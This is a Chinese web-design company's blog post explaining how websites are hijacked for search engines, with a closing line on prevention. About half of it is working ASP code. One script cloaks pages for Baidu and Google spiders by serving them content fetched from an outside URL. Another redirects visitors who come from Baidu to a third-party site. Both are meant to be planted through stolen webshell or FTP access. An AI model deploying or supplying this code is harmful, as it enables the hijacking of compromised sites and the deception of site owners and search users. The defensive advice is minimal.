前两天看到有网友问网站引擎劫持,网站快照劫持,新闻源劫持是怎么操作的。结果大多数网友都表示不了解,我今天来跟大家分享一下网站劫持是怎么操作的,如何防范。
1.网站快照劫持
动态页面首页通过在PHP或者ASP,ASPX文件中添加判断代码,判断如果是蜘蛛访问就修改标题内容,在标题内容写入联系方式和非法广告信息,如果不是蜘蛛访问就不做修改。
静态页面首页,在下午三点左右删除你的.html文件,添加inde.php,php中写入类似上面的语句,如果是蜘蛛就返回修改了标题的首页内容,不是就返回正常内容。
快照劫持比较讨厌,就算你修复了劫持,百度上还是会显示很长一段时间的非法快照信息。
代码如下:
<%
function GetBot()
'查询蜘蛛
dim s_agent
GetBot=""
s_agent=Request.ServerVariables("HTTP_USER_AGENT") '关键判断语句
if instr(1,s_agent,"googlebot",1) >0 then
GetBot="google"
end if
if instr(1,s_agent,"msnbot",1) >0 then
GetBot="MSN"
end if
if instr(1,s_agent,"slurp",1) >0 then
GetBot="Yahoo"
end if
if instr(1,s_agent,"baiduspider",1) >0 then
GetBot="baidu"
end if
if instr(1,s_agent,"sohu-search",1) >0 then
GetBot="Sohu"
end if
if instr(1,s_agent,"lycos",1) >0 then
GetBot="Lycos"
end if
if instr(1,s_agent,"robozilla",1) >0 then
GetBot="Robozilla"
end if
end function
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage=BytesToBstr(t,"GB2312")'编码
End function
Function Newstring(wstr,strng)
Newstring=Instr(lcase(wstr),lcase(strng))
if Newstring<=0 then Newstring=Len(wstr)
End Function
Function GetBody(url)
on error resume next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
Dim wstr,str,url,start,over,dtime
if GetBot="baidu" then
'给百度蜘蛛定制的内容
url="http://baidu.seowhy.com"
'想要展示给蜘蛛的页面地址
wstr=getHTTPPage(url)
body=wstr
response.write ""&body&""
response.end
elseif GetBot="google" then
'给google 蜘蛛定制的内容
url="http://baidu.seowhy.com"
wstr=getHTTPPage(url)
body=wstr
response.write ""&body&""
response.end
end if
2.搜索引擎流量劫持
这种劫持比快照劫持简单,直接在首页添加,判断访问来路是搜索引擎还是其它的JS代码,当来路是搜索引擎的时候就跳转到目标站。
代码如下:
<%
ifinstr(Request.ServerVariables("http_referer"),"www.baidu.com")>0then
'如果用户来自www.baidu.com
response.redirect("http://baidu.seowhy.com/")
'跳转指定地址
end if
%>
3.DNS白菜站劫持
在域名解析里添加泛解析到目标地址,在目标地址主机上大量生成劫持域名的子站。
总结:1和2需要获得网站的WEBSHELL或者FTP,如果获得了新闻源网站的这种权限,就可以做新闻源劫持;3需要获得DNS管理帐号。所以造成网站被劫持的主要原因还是自己网站被入侵,或者被扫FTP的挖掘机扫出了FTP帐号等,网络安全没做好的原因。所以只要网络安全到位,别人是劫持不你的网站的。欢迎大家持续关注北京网站建设公司的网站,希望大家能够从快帮云的网站中学到东西,增强自己的知识。
Copyright 2022 © 北京快帮科技集团有限公司 All Rights Reserved 京ICP备16051929号
北京快帮科技集团有限公司-北京网站建设/ 高端网页设计/ 天津网站建设/ 河北网站建设/ 武汉网站建设/ 上海网站建设/ 厦门网站建设/ 深圳网站建设/ 泉州网站建设/ 海南网站建设/ 青岛网站建设
24小时服务热线:4008-919-003 售后服务邮箱:kf@kbyun.com